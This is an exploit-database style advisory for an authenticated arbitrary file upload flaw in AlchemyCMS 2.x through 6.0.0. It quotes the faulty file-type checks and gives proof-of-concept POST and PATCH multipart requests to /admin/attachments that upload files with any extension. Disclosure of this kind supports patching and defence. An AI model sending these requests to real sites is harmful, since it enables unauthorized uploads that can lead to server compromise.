Authored by Abdulrahman

Alchemy CMS versions 2.x through 6.0.0 suffers from an arbitrary file upload vulnerability.

# Exploit Title: AlchemyCMS 2.x to 6.0.0 - Unrestricted File Upload (authenticated)
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://alchemy-cms.com
# Software Link: https://github.com/AlchemyCMS/alchemy_cms
# Version: from 2.0 to 6.0.0
# Tested on: Linux ruby 2.6.8p205 rails 6

in /app/models/alchemy/attachment.rb line 82 :

def allowed_filetypes
Config.get(:uploader).fetch("allowed_filetypes", {}).fetch("alchemy/attachments", [])
end
end

in /app/views/alchemy/admin/uploader/_button.html.erb in 18

configuration(:uploader)['allowed_filetypes'][object.class.model_name.collection] || ['*'] %>

POC :
POST /admin/attachments HTTP/1.1
------WebKitFormBoundarydAup7dA7ub3Weccp
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
Content-Type: application/octet-stream

anything

------WebKitFormBoundarydAup7dA7ub3Weccp--

OR
id = 8 for old attachment

PATCH /admin/attachments/8 HTTP/1.1
------WebKitFormBoundarylYnqNR9sxMPdw7Si
Content-Disposition: form-data; name="_method"

patch
------WebKitFormBoundarylYnqNR9sxMPdw7Si
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
Content-Type: application/octet-stream

anything
------WebKitFormBoundarylYnqNR9sxMPdw7Si--